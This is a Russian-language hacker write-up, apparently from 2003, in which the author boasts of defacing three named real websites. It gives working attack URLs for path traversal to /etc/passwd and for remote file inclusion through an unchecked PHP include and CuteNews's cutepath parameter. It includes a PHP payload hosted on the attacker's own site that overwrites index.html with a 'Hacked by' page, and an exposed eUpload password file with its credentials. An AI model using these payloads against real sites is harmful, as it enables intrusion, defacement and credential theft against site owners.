############################################
#!/usr/share/doc/defaced/1/tandp/sitedef.txt
############################################

Уязвимости на сайтах (примеры дефейсов) [ by Волков Сергей aka forSer ]

Дефейс проходящий через уязвимости найденные на сайте является одним из наиболее
распрастранненых  методов  взлома  сайтов. И он является результатом не крутости
каких  либо  лиц, называющих себя хакерами, а лоханутости админов :0) которые не
хотят (лень), не могут закрыть или просто незамечают дырки в своих “детищах”.

Пример 1: www.sgsha.stavropol.ru
Заметка: на сайте в данный момент сменен дизайн и данного бага уже не существует.
Сайт имели: Волков Сергей (forSer) & Москалев Андрей (MO$CAL)
Суть:

При заходе на сайт любой мог увидеть такую строчку:
http://www.sgsha.stavropol.ru/index1.php?path=akad.php

Ну вот, и у Вас, я думаю, уже есть мысли. Пробуем заменить:
http://www.sgsha.stavropol.ru/index1.php?path=../../../../../etc/passwd
В  результате  выполнения  данной  строчки у меня на экране появилось содержание
файла passwd. Конечно паролей там не оказалось.

Теперь пробуем другую вещь:
http://www.sgsha.stavropol.ru/index1.php?path=http://www.forser.by.ru/view.php
Вооооо…   скрипт   выполнен  так  как-будто  он  находится  на  этом  же  сайте.
Т.е. пишем любой скрипт php и дефейсим сайтик.

Для примера, простенький скрипт для просмотра содержимого каталога (view.php):

<?php
$handle=opendir(‘.’);
echo “Files: ”;
while (($file=readdir($handle))!==False) {
echo “$file “; }
closedir($handle);
?>

Т.к.  мы  имели  полный  доступ  к  сайту  мы  посмотрели  исходник index1.php и
выяснилось, что уязвимость существует из-за следующей строчки:

include(“$path”);

Значение   $path  не  проверяется,  поэтому  можно  подключать  файлы  с  других
сайтов.

На  вашем сайте также не советую использовать неизвестные скрипты, которые имеют
массовое  распространение,  т.к.  именно через них †ламеры† и могут взломать ваш
сайт.


Пример 2: www.erichmuehle.de

Заметка:  …сайт  висел  дефейснутым  где-то  9  дней  :0) я уж успел перед всеми
друзьями  похвастаться  … хе, хотя этот сайт мог взломать любой чувак без особых
напрягов.
Сайт имел: forSer
Суть:

дефейснуть сайт мне позволила уже всем известная уязвимость в
CuteNews v0.88 shownews.php:

if (!$cutepath) $cutepath=”.”;
require_once(“$cutepath/config.php”);
{……}
$all_news=file(“$cutepath/news.txt”);

Реализация:
(http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER])

А вот наша реализация:
http://www.erichmuehle.de/artikel/shownews.php?cutepath=http://www.forser.by.ru

предварительно  на  http://www.forser.by.ru  я закинул файл config.php следующего
содержания:

<?php
$context="<HTML><BODY BGCOLOR=#000000 text=#ffffff link=#ffffff>
<DIV align=center><TABLE width=750 border=0><TBODY><TR><TD align=center>
<h3>Hacked by <a href=mailto:[email protected]>forSer</a> 21/03/2003</h3></TD></TR>
</TBODY></TABLE></DIV>
</BODY></HTML>";

$fp=fopen("../index.html","w");
flock($fp, 2);
fwrite($fp,$context);
flock($fp, 3);
fclose($fp);
?>

Все о***нно, сайт дефеснут …жду, когда за мной приедут J


Пример 3: www.kottedg.far.ru

сайт  был  дефейснут благодаря недочету в eUpload (можно прочитать пароли и путь
для закачки в password.txt).

http://www.kottedg.far.ru/cgi-bin/upload/password.txt

Результат:
Kottedg nafig guest upl/

http://www.kottedg.far.ru/cgi-bin/upload/upload.html

закачиваю свои ПхП файлы и вперед.